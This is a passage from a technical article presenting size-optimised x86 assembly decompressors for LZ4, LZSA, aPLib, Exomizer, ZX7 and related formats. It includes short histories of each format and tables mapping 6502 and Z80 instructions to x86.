    mov    dl, [esi]         ; dl = *src++;
    inc    esi
    rcl    dl, 1
exit_get_bit:
    ret
init_get_bit:
    pop    ebp
    mov    dl, 128
lze_cl:
    movsb
lze_main:
    call   ebp               ; if(get_bit()) continue;
    jc     lze_cl
    
    call   ebp               ; if(get_bit()) {
    jc     lze_copy3
    
    xor    ecx, ecx          ; len = 0
    
    call   ebp               ; get_bit()
    adc    ecx, ecx
    
    call   ebp               ; get_bit()
    adc    ecx, ecx
    
    lodsb                    ; a.b[0] = *in++;
    mov    ah, -1            ; a.b[1] = 0xFF;
lze_copy1:
    inc    ecx               ; len++;
    jmp    lze_copy2
lze_copy3:                   ; else
    lodsw
    xchg   al, ah
    mov    ecx, eax
    shr    eax, 3            ; ofs /= 8
    or     ah, 0e0h
    and    ecx, 7            ; len %= 8
    jnz    lze_copy1
    mov    cl, [esi]         ; len = *src++;
    inc    esi
    ; EOF?
    jecxz  lze_exit          ; if(len == 0) break;
lze_copy2:
    movsx  eax, ax
    push   esi
    lea    esi, [edi+eax]
    inc    ecx
    rep    movsb
    pop    esi
    jmp    lze_main
    ; return (out - (uint8_t*)outbuf);
lze_exit:
    sub    edi, [esp+32+4]
    mov    [esp+28], edi
    popad
    ret

8.2 LZ4

Designed by Yann Collet and published in 2011. LZ4 is fast for both compression and decompression with a small decoder. Speed is somewhere between DEFLATE and LZO, while the compression ratio is similar to LZO but worse than DEFLATE. Despite the compression ratio being worse than DEFLATE, LZ4 doesn’t require a Huffman or arithmetic/range decoder. The following 32-Bit code is a conversion of the 8088/8086 implementation by Trixter. Jørgen Ibsen has implemented LZ4 with optimal parsing using BriefLZ algorithms.

lz4_depack:
_lz4_depack:
    pushad
    lea     esi,[esp+32+4]
    lodsd                   ;load target buffer
    xchg    eax,edi
    lodsd
    xchg    eax,ebx         ;BX = chunk length minus header
    lodsd                   ;load source buffer
    xchg    eax,esi
    add     ebx,esi         ;BX = threshold to stop decompression
    xor     ecx,ecx
@@parsetoken:               ;CX=0 here because of REP at end of loop
    mul     ecx
    lodsb                   ;grab token to AL
    mov     dl,al           ;preserve packed token in DX
@@copyliterals:
    shr     al,4            ;unpack upper 4 bits
    call    buildfullcount  ;build full literal count if necessary
@@doliteralcopy:            ;src and dst might overlap so do this by bytes
    rep     movsb           ;if cx=0 nothing happens
;At this point, we might be done; all LZ4 data ends with five literals and the
;offset token is ignored.  If we're at the end of our compressed chunk, stop.
    cmp     esi,ebx         ;are we at the end of our compressed chunk?
    jae     done            ;if so, jump to exit; otherwise, process match
@@copymatches:
    lodsw                   ;AX = match offset
    xchg    edx,eax         ;AX = packed token, DX = match offset
    and     al,0Fh          ;unpack match length token
    call    buildfullcount  ;build full match count if necessary
@@domatchcopy:
    push    esi             ;ds:si saved, xchg with ax would destroy ah
    mov     esi,edi
    sub     esi,edx
    add     ecx,4           ;minmatch = 4
                            ;Can't use MOVSWx2 because [es:di+1] is unknown
    rep     movsb           ;copy match run if any left
    pop     esi
    jmp     @@parsetoken
buildfullcount:
                            ;CH has to be 0 here to ensure AH remains 0
    cmp     al,0Fh          ;test if unpacked literal length token is 15?
    xchg    ecx,eax         ;CX = unpacked literal length token; flags unchanged
    jne     builddone       ;if AL was not 15, we have nothing to build
buildloop:
    lodsb                   ;load a byte
    add     ecx,eax         ;add it to the full count
    cmp     al,0FFh         ;was it FF?
    je      buildloop       ;if so, keep going
builddone:
    ret
done:
    sub     edi,[esp+32+4];subtract original offset from where we are now
    mov     [esp+28], edi
    popad
    ret

8.3 LZSA

Designed by Emmanuel Marty with participation from Introspec and published in 2018. Introspec explains the difference between the two formats, LZSA1 and LZSA2.

LZSA1 is designed to directly compete with LZ4. If you compress using “lzsa -f1 -r INPUT OUTPUT”, you are very likely to get higher compression ratio than LZ4 and probably slightly lower decompression speed compared to LZ4 (I am comparing speeds of LZSA1 fast decompressor and LZ4 fast decompressor, both hand-tuned by myself). If you really want to compete with LZ4 on speed, you need to compress using one of the “boost” options “lzsa -f1 -r -m4 INPUT OUTPUT” (better ratio, similar speed to LZ4) or “lzsa -f1 -r -m5 INPUT OUTPUT” (similar ratio, faster decompression than LZ4).

LZSA2 is approximately in the same league as BitBuster or ZX7. It’s likely to be worse if you’re compressing pure graphics (at least this is what we are seeing on ZX Spectrum), but it has much larger window and is pretty decent at compressing mixed data (e.g. a complete game binary or something similar). We accepted that the compression ratio is not the best because we wanted to preserve some of its speed. You should expect LZSA2 to decompress data about 50% faster than best I can do for ZX7. I did not do tests on BitBuster, but I just had a look at decompressor for ver.1.2 and there is no way it can compete with LZSA2 on speed.

lzsa1_decompress:
_lzsa1_decompress:
    pushad
    
    mov    edi, [esp+32+4]    ; edi = outbuf
    mov    esi, [esp+32+8]    ; esi = inbuf
    
    xor    ecx, ecx
.decode_token:
    mul    ecx
    lodsb                     ; read token byte: O|LLL|MMMM
    mov    dl, al             ; keep token in dl
   
    and    al, 070H           ; isolate literals length in token (LLL)
    shr    al, 4              ; shift literals length into place

    cmp    al, 07H            ; LITERALS_RUN_LEN?
    jne    .got_literals      ; no, we have the full literals count from the token, go copy

    lodsb                     ; grab extra length byte
    add    al, 07H            ; add LITERALS_RUN_LEN
    jnc    .got_literals      ; if no overflow, we have the full literals count, go copy
    jne    .mid_literals

    lodsw                     ; grab 16-bit extra length
    jmp    .got_literals

.mid_literals:
    lodsb                     ; grab single extra length byte
    inc    ah                 ; add 256

.got_literals:
    xchg   ecx, eax
    rep    movsb              ; copy cx literals from ds:si to es:di

    test   dl, dl             ; check match offset size in token (O bit)
    js     .get_long_offset

    dec     ecx
    xchg    eax, ecx          ; clear ah - cx is zero from the rep movsb above
    lodsb
    jmp     .get_match_length

.get_long_offset:
    lodsw                     ; Get 2-byte match offset

.get_match_length:
    xchg    eax, edx          ; edx: match offset  eax: original token
    and     al, 0FH           ; isolate match length in token (MMMM)
    add     al, 3             ; add MIN_MATCH_SIZE

    cmp     al, 012H          ; MATCH_RUN_LEN?
    jne     .got_matchlen     ; no, we have the full match length from the token, go copy

    lodsb                     ; grab extra length byte
    add     al,012H           ; add MIN_MATCH_SIZE + MATCH_RUN_LEN
    jnc     .got_matchlen     ; if no overflow, we have the entire length
    jne     .mid_matchlen       

    lodsw                     ; grab 16-bit length
    test    eax, eax          ; bail if we hit EOD
    je      .done_decompressing 
    jmp     .got_matchlen

.mid_matchlen:
    lodsb                     ; grab single extra length byte
    inc     ah                ; add 256

.got_matchlen:
    xchg    ecx, eax          ; copy match length into ecx
    xchg    esi, eax          
    mov     esi, edi          ; esi now points at back reference in output data
    movsx   edx, dx           ; sign-extend dx to 32-bits.
    add     esi, edx
    rep     movsb             ; copy match
    xchg    esi, eax          ; restore esi
    jmp     .decode_token     ; go decode another token

.done_decompressing:
    sub    edi, [esp+32+4]
    mov    [esp+28], edi      ; eax = decompressed size
    popad
    ret                       ; done

8.4 aPLib

Designed by Jørgen Ibsen and published in 1998, it continues to remain a closed-source compressor. Fortunately, an open-source version of the compressor called aPUltra is available, which was released by Emmanuel Marty in 2019. The small compressor in x86 assembly follows.

apl_decompress:
_apl_decompress:
    pushad

    %ifdef CDECL
      mov    esi, [esp+32+4]  ; esi = aPLib compressed data
      mov    edi, [esp+32+8]  ; edi = output
    %endif
    
    ; === register map ===
    ;  al: bit queue
    ;  ah: unused, but value is trashed
    ; ebx: follows_literal
    ; ecx: scratch register for reading gamma2 codes and storing copy length
    ; edx: match offset (and rep-offset)
    ; esi: input (compressed data) pointer
    ; edi: output (decompressed data) pointer
    ; ebp: offset of .get_bit 
           
    mov     al,080H         ; clear bit queue(al) and set high bit to move into carry
    xor     edx, edx        ; invalidate rep offset in edx

    call    .init_get_bit
.get_dibits:
    call    ebp             ; read data bit
    adc     ecx,ecx         ; shift into cx
.get_bit:
    add     al,al           ; shift bit queue, and high bit into carry
    jnz     .got_bit        ; queue not empty, bits remain
    lodsb                   ; read 8 new bits
    adc     al,al           ; shift bit queue, and high bit into carry
.got_bit:
    ret
.init_get_bit:
    pop     ebp             ; load offset of .get_bit, to be used with call ebp
    add     ebp, .get_bit - .get_dibits
.literal:
    movsb                   ; read and write literal byte
.next_command_after_literal:
    push    03H
    pop     ebx             ; set follows_literal(bx) to 3
    
.next_command:
    call    ebp             ; read 'literal or match' bit
    jnc     .literal        ; if 0: literal
                            
                            ; 1x: match
    call    ebp             ; read '8+n bits or other type' bit
    jc      .other          ; 11x: other type of match
                            ; 10: 8+n bits match
    call    .get_gamma2     ; read gamma2-coded high offset bits
    sub     ecx,ebx         ; high offset bits == 2 when follows_literal == 3 ?
                            ; (a gamma2 value is always >= 2, so substracting follows_literal when it
                            ; is == 2 will never result in a negative value)
    jae     .not_repmatch   ; if not, not a rep-match
    call    .get_gamma2     ; read match length
    jmp     .got_len        ; go copy
.not_repmatch:
    mov     edx,ecx         ; transfer high offset bits to dh
    shl     edx,8
    mov     dl,[esi]        ; read low offset byte in dl
    inc     esi
    call    .get_gamma2     ; read match length
    cmp     edx,7D00H       ; offset >= 32000 ?
    jae     .increase_len_by2 ; if so, increase match len by 2
    cmp     edx,0500H       ; offset >= 1280 ?
    jae     .increase_len_by1 ; if so, increase match len by 1
    cmp     edx,0080H       ; offset < 128 ?
    jae     .got_len        ; if so, increase match len by 2, otherwise it would be a 7+1 copy
.increase_len_by2:
    inc     ecx             ; increase length
.increase_len_by1:
    inc     ecx             ; increase length
    ; copy ecx bytes from match offset edx
.got_len:
    push    esi             ; save esi (current pointer to compressed data)
    mov     esi,edi         ; point to destination in edi - offset in edx
    sub     esi,edx
    rep     movsb           ; copy matched bytes
    pop     esi             ; restore esi
    mov     bl,02H          ; set follows_literal to 2 (ebx is unmodified by match commands)
    jmp     .next_command
    ; read gamma2-coded value into ecx
.get_gamma2:
    xor     ecx,ecx         ; initialize to 1 so that value will start at 2
    inc     ecx             ; when shifted left in the adc below
.gamma2_loop:
    call    .get_dibits     ; read data bit, shift into cx, read continuation bit
    jc      .gamma2_loop    ; loop until a zero continuation bit is read
    ret
    ; handle 7 bits offset + 1 bit len or 4 bits offset / 1 byte copy
.other:
    xor     ecx,ecx
    call    ebp             ; read '7+1 match or short literal' bit
    jc      .short_literal  ; 111: 4 bit offset for 1-byte copy
                            ; 110: 7 bits offset + 1 bit length
                            
    movzx   edx,byte[esi]   ; read offset + length in dl
    inc     esi
    inc     ecx             ; prepare cx for length below
    shr     dl,1            ; shift len bit into carry, and offset in place
    je      .done           ; if zero offset: EOD
    adc     ecx,ecx         ; len in cx: 1*2 + carry bit = 2 or 3
    jmp     .got_len
    ; 4 bits offset / 1 byte copy
.short_literal:
    call    .get_dibits     ; read 2 offset bits
    adc     ecx,ecx
    call    .get_dibits     ; read 2 offset bits
    adc     ecx,ecx
    xchg    eax,ecx         ; preserve bit queue in cx, put offset in ax
    jz      .write_zero     ; if offset is 0, write a zero byte
                            ; short offset 1-15
    mov     ebx,edi         ; point to destination in es:di - offset in ax
    sub     ebx,eax         ; we trash bx, it will be reset to 3 when we loop
    mov     al,[ebx]        ; read byte from short offset
.write_zero:
    stosb                   ; copy matched byte
    xchg    eax,ecx         ; restore bit queue in al
    jmp     .next_command_after_literal
.done:
    sub     edi, [esp+32+8] ; compute decompressed size
    mov     [esp+28], edi
    popad
    ret

9. MOS Technology 6502

This 8-Bit CPU was the product of Motorola management, ignoring customer concerns about the cost of the 6800 CPU launched by the company in 1974. Following consultations with potential customers for the 6800. Chuck Peddle tried to convince Motorola to develop a low-cost alternative for consumers on a limited budget.

Motorola ordered Peddle to cease working on this idea, which resulted in his departure from the company with several other employees that began working on the 6502 at MOS Technology. Used in the Commodore 64, the Apple II, and the BBC Micro home computers, including various gaming consoles, Motorola acknowledged missing a golden opportunity. The company would later express regret for dismissing Peddle’s idea since the 6502 was far more successful than the 6800.

Trivia: The Terminator movie from 1984 uses CPU instructions from the 6502. 🙂

Those of you that want to program a Commodore 64 without purchasing one can always use an emulator like VICE. For the Apple II, there’s AppleWin. (Yes, Windows only). Since Qkumba already implemented several popular depackers for 6502, I requested a translation of the Exomizer compression algorithm. Using this, I created the following table, which lists 6502 instructions and their equivalent for x86. The EBX and ECX registers replace the X and Y registers, respectively. Using #$80 as an immediate value is simply for demonstration, and you’ll find a full list of instructions here.

6502 x86 Description
lda #$80 mov al, 0x80 Load byte into accumulator.
sta [address] mov [address], al Store accumulator in memory.
cmp #$80 cmp al, 0x80 Compare byte with accumulator.
cpx #$80 cmp bl, 0x80 Compare byte with X.
cpy #$80 cmp cl, 0x80 Compare byte with Y.
asl shl al, 1 ASL shifts all bits left one position. 0 is shifted into bit 0 and the original bit 7 is shifted into the Carry.
lsr shr al, 1 Logical shift right.
bit #$7 test al, 7 Perform a bitwise AND, set the flags and discard the result.
sec stc SEt the Carry flag.
adc #$80 adc al, 0x80 Add byte with Carry.
sbc #$1 sbb al, 1 Subtract byte with Carry.
rts ret Return from subroutine.
jsr call Save next address and jump to subroutine.
eor #$80 xor al, 0x80 Perform an exclusive OR.
ora #$80 or al, 0x80 Perform a bitwise OR.
and #$80 and al, 0x80 Bitwise AND with accumulator
rol rcl al, 1 Shifts all bits left one position. The Carry is shifted into bit 0 and the original bit 7 is shifted into the Carry.
ror rcr al, 1 Shifts all bits right one position. The Carry is shifted into bit 7 and the original bit 0 is shifted into the Carry.
bpl jns Branch on PLus. Jump if Not Signed.
bmi js Branch on MInus. Jump if Signed.
bcc:bcs jnc:jc Branch on Carry Clear. Branch on Carry Set.
bne:beq jne:je Branch on Not Equal. Branch on EQual.
bvc:bvs jno:jo Branch on oVerflow Clear. Branch on oVerflow Set.
php pushf PusH Processor status.
plp popf PuLl Processor status.
pha push eax PusH Accumulator.
pla pop eax PuLl Accumulator.
tax movzx ebx, al / mov bl, al Transfer A to X.
tay movzx ecx, al / mov cl, al Transfer A to Y.
txa mov al, bl Transfer X to A.
tya mov al, cl Transfer Y to A.
inx inc ebx / inc bl INcrement X.
iny inc ecx / inc cl INcrement Y.
dex dec ebx / dec bl DEcrement X.
dey dec ecx / dec cl DEcrement Y.

9.1 Exomizer

Designed by Magnus Lind and published in 2002. Exomizer is popular for devices such as the Commodore VIC20, the C64, the C16/plus4, the C128, the PET 4032, the Atari 400/800 XL/XE, the Apple II+e, the Oric-1, the Oric Atmos, and the BBC Micro B. It inspired the development of other executable compressors, most notably PackFire. Qkumba was kind enough to provide a copy of the Exomizer 3 decoder translated from 6502 to x86. The Y register maps to the EDI register while the X register maps to the ESI register. Due to the complexity of the source code, only a snippet is shown here. See the full source here.

%MACRO mac_get_bits 0
        call get_bits                   ;jsr get_bits
%ENDM
get_bits:
        adc  al, 0x80                   ;adc #$80                ; needs c=0, affects v
        pushfd
        shl  al, 1                      ;asl
        lahf
        jns  gb_skip                    ;bpl gb_skip
gb_next:
        shl  byte [zp_bitbuf], 1        ;asl zp_bitbuf
        jne  gb_ok                      ;bne gb_ok
        mac_refill_bits                 ;+mac_refill_bits
gb_ok:
        rcl  al, 1                      ;rol
        lahf
        test al, al
        js   gb_next                    ;bmi gb_next
gb_skip:
        popfd
        sahf
        jo   gb_get_hi                  ;bvs gb_get_hi
        ret                             ;rts
gb_get_hi:
        stc                             ;sec
        mov  [zp_bits_hi], al           ;sta zp_bits_hi
        jmp  get_crunched_byte          ;jmp get_crunched_byte
%ENDIF
; -------------------------------------------------------------------
; calculate tables (62 bytes) + get_bits macro
; x and y must be #0 when entering
;
        clc                             ;clc
table_gen:
        movzx esi, al                   ;tax
        mov   eax, edi                  ;tya
        and   al, 0x0f                  ;and #$0f
        mov   [edi + tabl_lo], al       ;sta tabl_lo,y
        je    shortcut                  ;beq shortcut            ; start a new sequence
; -------------------------------------------------------------------
        mov   eax, esi                  ;txa
        adc   al, [edi + tabl_lo - 1]   ;adc tabl_lo - 1,y
        mov   [edi + tabl_lo], al       ;sta tabl_lo,y
        mov   al, [zp_len_hi]           ;lda zp_len_hi
        adc   al, [edi + tabl_hi - 1]   ;adc tabl_hi - 1,y
shortcut:
        mov   [edi + tabl_hi], al       ;sta tabl_hi,y
; -------------------------------------------------------------------
        mov   al, 0x01                  ;lda #$01
        mov   [zp_len_hi], al           ;sta <zp_len_hi
        mov   al, 0x78                  ;lda #$78                ; %01111000
        mac_get_bits                    ;+mac_get_bits
; -------------------------------------------------------------------
        shr   al, 1                     ;lsr
        movzx esi, al                   ;tax
        je    rolled                    ;beq rolled
        pushfd                          ;php
rolle:
        shl  byte [zp_len_hi],1         ;asl zp_len_hi
        stc                             ;sec
        rcr  al, 1                      ;ror
        dec  esi                        ;dex
        jne  rolle                      ;bne rolle
        popfd                           ;plp
rolled:
        rcr  al, 1                      ;ror
        mov  [edi + tabl_bi], al        ;sta tabl_bi,y
        test al, al
        js   no_fixup_lohi              ;bmi no_fixup_lohi
        mov  al, [zp_len_hi]            ;lda zp_len_hi
        mov  ebx, esi
        mov  [zp_len_hi], bl            ;stx zp_len_hi
        jmp  skip_fix                   ;!BYTE $24
no_fixup_lohi:
        mov  eax, esi                   ;txa
; -------------------------------------------------------------------
skip_fix:
        inc  edi                        ;iny
        cmp  edi, encoded_entries       ;cpy #encoded_entries
        jne  table_gen                  ;bne table_gen

9.2 Pucrunch

Designed by Pasi Ojala and published in 1997. It’s described by the author as a Hybrid LZ77 and RLE compressor, using Elias gamma coding for reference length, and a mixture of gamma and linear code for the offset. It requires no additional memory for decompression. The description and source code are well worth a read for those of you that want to understand the characteristics of other LZ77-style compressors.

10. Zilog 80

I was able to design whatever I wanted. And personally I wanted to develop the best and the most wonderful 8-Bit microprocessor in the world.Masatoshi Shima

After helping to design microprocessors at Intel (4-Bit 4004, the 8-Bit 8008 and 8080), Ralph Ungermann and Federico Faggin left Intel in 1974 to form Zilog. Masatoshi Shima, who also worked at Intel, would later join the company in 1975 to work on an 8-Bit CPU released in 1976 they called the Z80. The Z80 is essentially a clone of the Intel 8080 with support for more instructions, more registers, and 16-Bit capabilities. Many of the Z80 instructions, to the best of my knowledge, do not have an equivalent on the x86. Proceed with caution, as with no prior experience writing for the Z80, some of the mappings presented here may be incorrect.

Z80 x86 Z80 Description
bit test Perform a bitwise AND, set state flags and discard result.
ccf cmc Inverts/Complements the carry flag.
cp cmp Performs subtraction from A. Sets flags and discards result.
djnz loop Decreases B and jumps to a label if Not Zero. If mapping BC to CX, LOOP works or REP depending on operation.
ex xchg Exchanges two 16-bit values.
exx EXX exchanges BC, DE, and HL with shadow registers with BC’, DE’, and HL’. Unfortunately, nothing like this available for x86. Try to use spare registers or rewrite algorithm to avoid using EXX.
jp jcc Conditional or unconditional jump to absolute address.
jr jcc Conditional or unconditional jump to relative address not exceeding 128-bytes ahead or behind.
ld mov Load/Copy immediate value or register to another register.
ldi movsb Performs a “LD (DE),(HL)”, then increments DE and HL. Map SI to HL, DI to DE and you can perform the same operation quite easily on x86.
ldir rep movsb Repeats LDI (LD (DE),(HL), then increments DE, HL, and decrements BC) until BC=0. Note that if BC=0 before this instruction is called, it will loop around until BC=0 again.
res btr Reset bit. BTR doesn’t behave exactly the same, but it’s close enough. An alternative might be masking with AND.
rl / rla / rlc / rlca rcl or adc The register is shifted left and the carry flag is put into bit zero of the register. The 7th bit is put into the carry flag. You can perform the same operation using ADC (Add with Carry).
rld Performs a 4-bit leftward rotation of the 12-bit number whose 4 most signigifcant bits are the 4 least significant bits of A, and its 8 least significant bits are in (HL).
rr / rra / r rcr 9-bit rotation to the right. The carry is copied into bit 7, and the bit leaving on the right is copied into the carry.
rra Performs a RR A faster, and modifies the flags differently.
sbc sbb Sum of second operand and carry flag is subtracted from the first operand. Results are written into the first operand.
sla sal
sll/sl1 shl An “undocumented” instruction. Functions like sla, except a 1 is inserted into the low bit.
sra sar Arithmetic shift right 1 bit, bit 0 goes to carry flag, bit 7 remains unchanged.
srl shr Like SRA, except a 0 is put into bit 7. The bits are all shifted right, with bit 0 put into the carry flag.

10.1 Mega LZ

Designed by the demo group MAYhEM and published in 2005. The original Z80 decoder by fyrex was optimized by Introspec in 2017 while researching 8-Bit compression algorithms. The x86 assembly based on that uses the following register mapping.

Register Mapping
Z80 x86
A AL
B EBX
C ECX
D DH
E DL
HL ESI
DE EDI

The EBX and ECX registers are to replace the B and C registers, respectively, to save a few bytes required for incrementing and decrementing 8-bit registers on x86.

megalz_depack:
_megalz_depack:
    pushad
    
    mov    esi, [esp+32+12]  ; esi = inbuf
    mov    edi, [esp+32+ 4]  ; edi = outbuf
    
    call   init_get_bit
    
    add    al, al            ; add a, a
    jnz    exit_get_bit      ; ret nz
    lodsb                    ; ld a, (hl)
                             ; inc hl
    adc    al, al            ; rla
exit_get_bit:
    ret                      ; ret
init_get_bit:
    pop    ebp               ;
    mov    al, 128           ; ld a, 128
mlz_literal:
    movsb                    ; ldi
mlz_main:
    call   ebp               ; GET_BIT
    jc     mlz_literal       ; jr c, mlz_literal
    xor    edx, edx
    mov    dh, -1            ; ld d, #FF
    xor    ebx, ebx          ; ld bc, 2
    push   2
    pop    ecx
    call   ebp               ; GET_BIT
    jc     CASE01x           ; jr c, CASE01x
    call   ebp               ; GET_BIT
    jc     mlz_short_ofs     ; jr c, mlz_short_ofs
CASE000:
    dec    ecx               ; dec c
    mov    dl, 63            ; ld e, %00111111
ReadThreeBits:
    call   ebp               ; GET_BIT
    adc    dl, dl            ; rl e
    jnc    ReadThreeBits     ; jr nc, ReadThreeBits
mlz_copy_bytes:
    push   esi               ; push hl
    movsx  edx, dx           ; sign-extend dx to 32-bits
    lea    esi, [edi+edx]    ; 
    rep    movsb             ; ldir
    pop    esi               ; pop hl
    jmp    mlz_main          ; jr mlz_main
CASE01x:
    call   ebp               ; GET_BIT
    jnc    CASE010           ; jr nc, CASE010
    dec    ecx               ; dec c
ReadLogLength:
    call   ebp               ; GET_BIT
    inc    ebx               ; inc b
    jnc    ReadLogLength     ; jr nc, ReadLogLength
mlz_read_len:
    call   ebp               ; GET_BIT
    adc    cl, cl            ; rl c
    jc     mlz_exit          ; jr c, mlz_exit
    dec    ebx               ; djnz mlz_read_len
    jnz    mlz_read_len
    inc    ecx               ; inc c
CASE010:
    inc    ecx               ; inc c
    call   ebp               ; GET_BIT
    jnc    mlz_short_ofs     ; jr nc, mlz_short_ofs
    mov    dh, 31            ; ld d, %00011111
mlz_long_ofs:
    call   ebp               ; GET_BIT
    adc    dh, dh            ; rl d
    jnc    mlz_long_ofs      ; jr nc, mlz_long_ofs
    dec    edx               ; dec d
mlz_short_ofs:
    mov    dl, [esi]         ; ld e, (hl)
    inc    esi               ; inc hl
    jmp    mlz_copy_bytes    ; jr mlz_copy_bytes
mlz_exit:
    sub    edi, [esp+32+4]
    mov    [esp+28], edi     ; eax = decompressed length
    popad
    ret

10.2 ZX7

Designed by Einar Saukas and published in 2012. ZX7 is an optimal LZ77 algorithm for the ZX-Spectrum using a combination of fixed length and variable length Gamma codes for the match length and offset. The following is a translation of the standard Z80 depacker to a 32-bit x86 assembly in 111 bytes.

Register Mapping
Z80 x86
A AL
B CH
C CL
BC CX
D DH
E DL
HL ESI
DE EDX or EDI
dzx7_standard:
_dzx7_standard:
    pushad
    
    ; tested on Windows
    mov    esi, [esp+32+12]     ; hl = source
    mov    edi, [esp+32+ 4]     ; de = destination
    
    mov    al, 0x80             ; ld      a, $80
dzx7s_copy_byte_loop:
    ; copy literal byte
    movsb                       ; ldi                             
dzx7s_main_loop:
    call   dzx7s_next_bit       ; call    dzx7s_next_bit
; next bit indicates either literal or sequence
    jnc    dzx7s_copy_byte_loop ; jr      nc, dzx7s_copy_byte_loop

; determine number of bits used for length (Elias gamma coding)
    push   edi                  ; push    de
    mov    ecx, 0               ; ld      bc, 0
    mov    dh, ch               ; ld      d, b
dzx7s_len_size_loop:
    inc    dh                   ; inc     d
    call   dzx7s_next_bit       ; call    dzx7s_next_bit
    jnc    dzx7s_len_size_loop  ; jr      nc, dzx7s_len_size_loop
; determine length
dzx7s_len_value_loop:
    jc     skip_call
    call   dzx7s_next_bit       ; call    nc, dzx7s_next_bit
skip_call:
    rcl    cl, 1                ; rl      c
    rcl    ch, 1                ; rl      b
    ; check end marker
    jc     dzx7s_exit           ; jr      c, dzx7s_exit           
    dec    dh                   ; dec     d
    jnz    dzx7s_len_value_loop ; jr      nz, dzx7s_len_value_loop
    ; adjust length
    inc    cx                   ; inc     bc                      

; determine offset
    ; load offset flag (1 bit) + offset value (7 bits)
    mov    dl, [esi]            ; ld      e, (hl)                 
    inc    esi                  ; inc     hl
    ; opcode for undocumented instruction "SLL E" aka "SLS E"
    shl    dl, 1                ; defb    $cb, $33                
    ; if offset flag is set, load 4 extra bits
    jnc    dzx7s_offset_end     ; jr      nc, dzx7s_offset_end    
    ; bit marker to load 4 bits
    mov    dh, 0x10             ; ld      d, $10                  
dzx7s_rld_next_bit:
    call   dzx7s_next_bit       ; call    dzx7s_next_bit
    ; insert next bit into D
    rcl    dh, 1                ; rl      d                       
    ; repeat 4 times, until bit marker is out
    jnc    dzx7s_rld_next_bit   ; jr      nc, dzx7s_rld_next_bit  
    ; add 128 to DE
    inc    dh                   ; inc     d 
    ; retrieve fourth bit from D                      
    shr    dh, 1                ; srl	d			
dzx7s_offset_end:
    ; insert fourth bit into E
    rcr    dl, 1                ; rr      e                       

; copy previous sequence
    ; store source, restore destination
    xchg   esi, [esp]           ; ex      (sp), hl 
    ; store destination
    push   esi                  ; push    hl                      
    ; HL = destination - offset - 1
    sbb    esi, edx             ; sbc     hl, de                  
    ; DE = destination
    pop    edi                  ; pop     de                      
    rep    movsb                ; ldir
dzx7s_exit:
    pop    esi                  ; pop     hl             
    jnc    dzx7s_main_loop      ; jr      nc, dzx7s_main_loop
    sub    edi, [esp+32+4]
    mov    [esp+28], edi
    popad
    ret
dzx7s_next_bit:
    ; check next bit
    add    al, al               ; add     a, a    
    ; no more bits left?
    jnz    exit_get_bit         ; ret     nz      
    ; load another group of 8 bits
    mov    al, [esi]            ; ld      a, (hl) 
    inc    esi                  ; inc     hl
    rcl    al, 1                ; rla
exit_get_bit:
    ret                         ; ret

The following is a 32-Bit version of a size-optimized 16-bit code implemented by Trixter and Qkumba in 2016. It’s currently 81 bytes.

zx7_depack:
_zx7_depack:
    pushad
    mov    edi, [esp+32+ 4] ; output
    mov    esi, [esp+32+12] ; input
    
    call   init_get_bit
    add    al, al           ; check next bit
    jnz    exit_get_bit     ; no more bits left?
    lodsb                   ; load another group of 8 bits
    adc    al, al
exit_get_bit:
    ret
init_get_bit:
    pop    ebp
    mov    al, 80h
    xor    ecx, ecx
copy_byte:
    movsb                    ; copy literal byte
main_loop:
    call   ebp
    jnc    copy_byte         ; next bit indicates either
                             ; literal or sequence
; determine number of bits used for length (Elias gamma coding)
    xor    ebx, ebx
len_size_loop:
    inc    ebx
    call   ebp
    jnc    len_size_loop
    jmp    len_value_skip
; determine length
len_value_loop:
    call   ebp
len_value_skip:
    adc    cx, cx
    jc     zx7_exit       ; check end marker
    
    dec    ebx
    jnz    len_value_loop
    
    inc    ecx            ; adjust length
                          ; determine offset
    mov    bl, [esi]      ; load offset flag (1 bit) +
                          ; offset value (7 bits)
    inc    esi
    stc
    adc    bl, bl
    jnc    offset_end     ; if offset flag is set, load
                          ; 4 extra bits
    mov    bh, 10h        ; bit marker to load 4 bits
rld_next_bit:
    call   ebp
    adc    bh, bh         ; insert next bit into D
    jnc    rld_next_bit   ; repeat 4 times, until bit
                          ; marker is out
    inc    bh             ; add 256 to DE
offset_end:
    shr    ebx, 1         ; insert fourth bit into E
    push   esi
    mov    esi, edi
    sbb    esi, ebx       ; destination = destination - offset - 1
    rep    movsb
    pop    esi            ; restore source address
    jmp    main_loop
zx7_exit:
    sub    edi, [esp+32+4]
    mov    [esp+28], edi
    popad
    ret

10.3 ZX7 Mini

Designed by Antonio Villena and published in 2019. This version uses less code at the expense of the compression ratio. Nevertheless, it’s a great example to demonstrate the conversion between Z80 and x86.

Register Mapping
Z80 x86
A AL
BC ECX
D DH
E DL
HL ESI
DE EDI
zx7_depack:
_zx7_depack:
    pushad

    mov    esi, [esp+32+4] ; esi = in
    mov    edi, [esp+32+8] ; edi = out

    call   init_getbit
getbit:  
    add    al, al          ; add     a, a
    jnz    exit_getbit     ; ret     nz
    lodsb                  ; ld      a, (hl)
                           ; inc     hl
    adc    al, al          ; adc     a, a
exit_getbit:
    ret
init_getbit:
    pop    ebp             ;
    mov    al, 80h         ; ld      a, $80
copyby:  
    movsb                  ; ldi
mainlo:
    call   ebp             ; call    getbit
    jnc    copyby          ; jr      nc, copyby
    push   1               ; ld      bc, 1
    pop    ecx
lenval:  
    call   ebp             ; call    getbit
    rcl    cl, 1           ; rl      c
    jc     exit_depack     ; ret     c
    call   ebp             ; call    getbit
    jnc    lenval          ; jr      nc, lenval
    push   esi             ; push    hl
    movzx  edx, byte[esi]  ; ld      l, (hl)
    mov    esi, edi
    sbb    esi, edx        ; sbc     hl, de
    rep    movsb           ; ldir
    pop    esi             ; pop     hl
    inc    esi             ; inc     hl
    jmp    mainlo          ; jr      mainlo
exit_depack:
    sub    edi, [esp+32+8] ;
    mov    [esp+28], edi
    popad
    ret

10.4 LZF

Designed by Ilya Muravyov and published here in 2013. The x86 assembly is a translation of a size-optimized version by introspec. The compressor is closed, so this is another example to demonstrate the conversion between Z80 and x86.

lzf_depack:    
_lzf_depack:    
    pushad
    mov    edi, [esp+32+4]   ; edi = outbuf
    mov    esi, [esp+32+8]   ; esi = inbuf
    
    xor    ecx, ecx          ; ld b,0 
    jmp    MainLoop          ; jr MainLoop  ; all copying is done by LDIR; B needs to be zero
ProcessMatches:        
    push   eax               ; exa
    lodsb                    ; ld a,(hl)
                             ; inc hl
                             ; rlca  
                             ; rlca  
    rol    al, 3             ; rlca 
    inc    al                ; inc a
    and    al, 00000111b     ; and %00000111 
